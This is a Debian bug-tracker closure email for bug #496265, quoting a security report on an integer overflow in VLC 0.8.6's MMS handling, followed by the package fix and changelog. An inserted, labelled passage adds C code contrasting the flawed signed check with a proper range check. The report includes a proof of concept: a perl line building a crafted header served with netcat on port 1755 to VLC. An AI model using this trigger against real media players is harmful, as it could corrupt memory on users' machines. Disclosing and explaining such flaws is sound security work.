Your message dated Mon, 25 Aug 2008 12:02:29 +0000
with message-id <[EMAIL PROTECTED]>
and subject line Bug#496265: fixed in vlc 0.8.6.h-4
has caused the Debian Bug report #496265,
regarding vlc: buffer overflow in mms handling
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)

--
496265: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496265
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: vlc
Version: 0.8.6.i-1
Severity: grave
Tags: security

Hi,
the following security issue was published for vlc.

    static int mms_ReceiveCommand( access_t *p_access )
    {
        access_sys_t *p_sys = p_access->p_sys;

        for( ;; )
        {
            int i_used;
            int i_status;

            if( NetFillBuffer( p_access ) < 0 )
            {
                msg_Warn( p_access, "cannot fill buffer" );
                return VLC_EGENERIC;
            }
            if( p_sys->i_buffer_tcp > 0 )
            {
    [1]         i_status = mms_ParseCommand( p_access, p_sys->buffer_tcp,
                                             p_sys->i_buffer_tcp, &i_used );
    [2]         if( i_used < MMS_BUFFER_SIZE )
                {
    [3]             memmove( p_sys->buffer_tcp, p_sys->buffer_tcp + i_used,
                             MMS_BUFFER_SIZE - i_used ); //BUG! i_used overflow
    (...)

[1] - function that sets i_used to negative value, see below
[2] - i_used is signed, so predicate is true
[3] - actual overflow, we have good control over what is written

    static int mms_ParseCommand( access_t *p_access, uint8_t *p_data,
                                 int i_data, int *pi_used )
    (...)
        i_length = GetDWLE( p_data + 8 ) + 16;
    (...)
        if( i_length > p_sys->i_cmd )
        {
            msg_Warn( p_access, "truncated command (missing %d bytes)",
                      i_length - i_data );
            p_sys->i_command = 0;
            return -1;
        }
    [1] else if( i_length < p_sys->i_cmd )
        {
            p_sys->i_cmd = i_length;
    [2]     *pi_used = i_length;
        }
    (...)

[1] - predicate is true
[2] - sets i_used from mms_ReceiveCommand

- Proof of concept -

on localhost:

    perl -e 'print "aaaa\xce\xfa\x0b\xb0\xef\xff\xef\xff"; print "a"x100' > headshot
    nc -l -v -p 1755 < headshot

open this url in VLC:

    mmst://127.0.0.1/

I can confirm this issue exists.

Please see http://www.orange-bat.com/adv/2008/adv.08.24.txt for the
original advisory.

I'll follow up on this bug report with a CVE id soon.

Kind regards
Nico

--
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
--- End Message ---
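
An added example, not part of the original report or of VLC's code: the signed, upper-bound-only check described in the report's notes [2] and [3], beside a range check that rejects a negative consumed length. The value MMS_BUFFER_SIZE = 100000, the helper names, the 112-byte buffer fill and the benign header are assumptions made for the illustration; no memmove is performed.

```c
#include <stdint.h>
#include <stdio.h>

#define MMS_BUFFER_SIZE 100000 /* assumed; the report does not give the value */

/* Bytes 0..11 of the header quoted in the report; length field at offset 8. */
static const uint8_t report_hdr[12] = { 'a','a','a','a', 0xce,0xfa,0x0b,0xb0,
                                        0xef,0xff,0xef,0xff };
/* Constructed well-formed header: length field 0x20. */
static const uint8_t benign_hdr[12] = { 'a','a','a','a', 0xce,0xfa,0x0b,0xb0,
                                        0x20,0x00,0x00,0x00 };

/* Little-endian 32-bit read (stand-in for VLC's GetDWLE). */
static uint32_t get_dwle(const uint8_t *p)
{
    return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* i_length = GetDWLE(p_data + 8) + 16, stored in a signed int as quoted. */
static int32_t command_length(const uint8_t *p_data)
{
    return (int32_t)(get_dwle(p_data + 8) + 16u); /* wraps on two's complement */
}

/* Check [2] from the report: only an upper bound, compared as signed. */
static int unsafe_check(int32_t i_used) { return i_used < MMS_BUFFER_SIZE; }

/* Byte count that memmove() at [3] would be asked to copy. */
static long unsafe_move_len(int32_t i_used) { return (long)MMS_BUFFER_SIZE - i_used; }

/* Hardened: consumed bytes must lie in [0, i_buffer]; -1 means reject. */
static long safe_remaining(int32_t i_used, int32_t i_buffer)
{
    if (i_buffer < 0 || i_buffer > MMS_BUFFER_SIZE) return -1;
    if (i_used < 0 || i_used > i_buffer) return -1;
    return (long)i_buffer - i_used;
}

int main(void)
{
    int32_t bad = command_length(report_hdr), ok = command_length(benign_hdr);
    printf("report: i_used=%d unsafe_check=%d move_len=%ld safe=%ld\n",
           (int)bad, unsafe_check(bad), unsafe_move_len(bad), safe_remaining(bad, 112));
    printf("benign: i_used=%d unsafe_check=%d move_len=%ld safe=%ld\n",
           (int)ok, unsafe_check(ok), unsafe_move_len(ok), safe_remaining(ok, 112));
    return 0;
}
```

With the report's header the signed check passes while the requested copy length exceeds the whole buffer and the source pointer lies before it; the range check rejects the same value.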
--- Begin Message ---
Source: vlc
Source-Version: 0.8.6.h-4

We believe that the bug you reported is fixed in the latest version of
vlc, which is due to be installed in the Debian FTP archive:

libvlc0-dev_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/libvlc0-dev_0.8.6.h-4_i386.deb
libvlc0_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/libvlc0_0.8.6.h-4_i386.deb
mozilla-plugin-vlc_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/mozilla-plugin-vlc_0.8.6.h-4_i386.deb
vlc-nox_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-nox_0.8.6.h-4_i386.deb
vlc-plugin-arts_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-plugin-arts_0.8.6.h-4_i386.deb
vlc-plugin-esd_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-plugin-esd_0.8.6.h-4_i386.deb
vlc-plugin-ggi_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-plugin-ggi_0.8.6.h-4_i386.deb
vlc-plugin-glide_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-plugin-glide_0.8.6.h-4_i386.deb
vlc-plugin-jack_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-plugin-jack_0.8.6.h-4_i386.deb
vlc-plugin-sdl_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-plugin-sdl_0.8.6.h-4_i386.deb
vlc-plugin-svgalib_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-plugin-svgalib_0.8.6.h-4_i386.deb
vlc_0.8.6.h-4.diff.gz
  to pool/main/v/vlc/vlc_0.8.6.h-4.diff.gz
vlc_0.8.6.h-4.dsc
  to pool/main/v/vlc/vlc_0.8.6.h-4.dsc
vlc_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc_0.8.6.h-4_i386.deb

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Christophe Mutricy <[EMAIL PROTECTED]> (supplier of updated vlc package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])

Format: 1.8
Date: Mon, 25 Aug 2008 01:07:27 +0100
Source: vlc
Binary: vlc vlc-nox libvlc0 libvlc0-dev vlc-plugin-esd vlc-plugin-sdl vlc-plugin-ggi vlc-plugin-glide vlc-plugin-arts mozilla-plugin-vlc vlc-plugin-svgalib vlc-plugin-jack
Architecture: source i386
Version: 0.8.6.h-4
Distribution: unstable
Urgency: high
Maintainer: Debian multimedia packages maintainers <[EMAIL PROTECTED]>
Changed-By: Christophe Mutricy <[EMAIL PROTECTED]>
Description:
 libvlc0    - multimedia player and streamer library
 libvlc0-dev - development files for VLC
 mozilla-plugin-vlc - multimedia plugin for web browsers based on VLC
 vlc        - multimedia player and streamer
 vlc-nox    - multimedia player and streamer (without X support)
 vlc-plugin-arts - aRts audio output plugin for VLC
 vlc-plugin-esd - Esound audio output plugin for VLC
 vlc-plugin-ggi - GGI video output plugin for VLC
 vlc-plugin-glide - Glide video output plugin for VLC
 vlc-plugin-jack - Jack audio plugins for VLC
 vlc-plugin-sdl - SDL video and audio output plugin for VLC
 vlc-plugin-svgalib - SVGAlib video output plugin for VLC
Closes: 496265
Changes:
 vlc (0.8.6.h-4) unstable; urgency=high
 .
   * Security: Fix integer overflow in mms module (Closes: #496265)
     (407-mms-overflow.diff taken from upstream)
--- End Message ---